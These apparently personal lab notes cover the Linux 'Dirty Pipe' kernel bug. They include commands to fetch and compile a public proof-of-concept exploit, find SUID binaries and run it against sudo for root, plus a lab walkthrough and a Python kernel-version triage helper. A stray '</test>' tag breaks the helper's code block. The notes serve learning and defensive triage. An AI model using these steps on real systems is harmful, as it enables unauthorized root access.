# Intro
- [CVE-2022-0847](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847) (aka `Dirty Pipe`) is a vuln in the Linux kernel that allows an unprivileged local user to write to files owned by root
- This vuln is similar to the [Dirty Cow](https://dirtycow.ninja/) vuln discovered in 2016
- All kernels from version `5.8` to `5.17` are affected by this vuln
- This vulnerability lies in pipes, a mechanism for unidirectional communication between processes
- For example, we could edit the `/etc/passwd` file and remove the root user's password
- This would allow us to log in as root with the `su` command without being prompted for a password
# Dirty Pipe Exploit
- First, determine the target's kernel version
```bash
uname -a
```
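The version from `uname -r` is only a first filter, since distro kernels (e.g. Ubuntu's `5.15.0-xx-generic`) carry backported fixes without bumping the upstream patch level. The following triage helper is an added example, not part of the original note or the PoC repo; it classifies a release string against the upstream fix versions for CVE-2022-0847 (5.10.102, 5.15.25, 5.16.11 and 5.17) and flags anything else in the `5.8`+ range as "check advisories" rather than "vulnerable".

```python
import platform
import re

# Upstream stable releases that shipped the Dirty Pipe fix (CVE-2022-0847).
# Series between 5.8 and 5.17 not listed here were already end-of-life
# upstream and never received the fix in a stable release.
FIXED_IN = {
    (5, 10): (5, 10, 102),
    (5, 15): (5, 15, 25),
    (5, 16): (5, 16, 11),
}
FIRST_AFFECTED = (5, 8, 0)        # bug introduced in 5.8
FIRST_FIXED_MAINLINE = (5, 17, 0)  # 5.17 final already carries the fix


def parse_kernel_release(release: str) -> tuple:
    """Turn a `uname -r` string such as '5.15.0-46-generic' into (5, 15, 0)."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch = m.group(1), m.group(2), m.group(3) or "0"
    return (int(major), int(minor), int(patch))


def dirty_pipe_status(release: str) -> str:
    """Classify a kernel release by upstream version alone.

    Returns 'not affected', 'fixed upstream' or 'check advisories'.
    'check advisories' means the upstream number is in the affected range,
    but a distribution build may still have the fix backported, so the
    exact package version must be compared against the distro's advisory.
    """
    ver = parse_kernel_release(release)
    if ver < FIRST_AFFECTED:
        return "not affected"
    if ver >= FIRST_FIXED_MAINLINE:
        return "fixed upstream"
    fix = FIXED_IN.get(ver[:2])
    if fix is not None and ver >= fix:
        return "fixed upstream"
    return "check advisories"


def check_local_kernel() -> str:
    """Run the classification against the kernel this script is executing on."""
    return dirty_pipe_status(platform.release())


if __name__ == "__main__":
    print(platform.release(), "->", check_local_kernel())
</test>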
- Once we confirm the vulnerability, we can use this [PoC](https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits) to exploit the `Dirty Pipe` vuln
```bash
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cd CVE-2022-0847-DirtyPipe-Exploits
bash compile.sh
```
- After compiling the code, we have two different exploits available
## `exploit-1`
- The first exploit version (`exploit-1`) modifies `/etc/passwd` and gives us a shell prompt with root privs
## `exploit-2`
- The second exploit version (`exploit-2`) lets us execute a SUID binary with root privs
- But first we need to find such SUID binaries
```bash
find / -perm -4000 2>/dev/null
```
- After determining that `/usr/bin/sudo` has the SUID bit set, we can execute `exploit-2` as below
```bash
./exploit-2 /usr/bin/sudo
```
---
# Exercise
## Initial Enum
- `ping` test ![[images/Pasted image 20260214150323.png]]
- `nmap` scans ![[images/Pasted image 20260214150501.png]]
- `ssh` into target with given creds
- initial internal enum ![[images/Pasted image 20260214150517.png]]
## Kernel and SUID Enum
- Kernel version 5.15.0 is vulnerable to `Dirty Pipe` ![[images/Pasted image 20260214150616.png]]
- `/usr/bin/sudo` has the SUID bit set ![[images/Pasted image 20260214150639.png]]
## Exploit the `Dirty Pipe` Vuln
- `git clone` PoC on Kali ![[images/Pasted image 20260214150803.png]]
- move `compile.sh` to target
- serve from Kali ![[images/Pasted image 20260214151000.png]]
- `wget` from target ![[images/Pasted image 20260214150948.png]]
- compile on target
- getting errors ![[images/Pasted image 20260214151135.png]]
- looks like we need `exploit-1.c` and `exploit-2.c` on target
- move `.c` files from Kali to target ![[images/Pasted image 20260214151237.png]]
- try to compile again > successful this time ![[images/Pasted image 20260214151336.png]]
- run the `exploit-2` > root! ![[images/Pasted image 20260214151452.png]]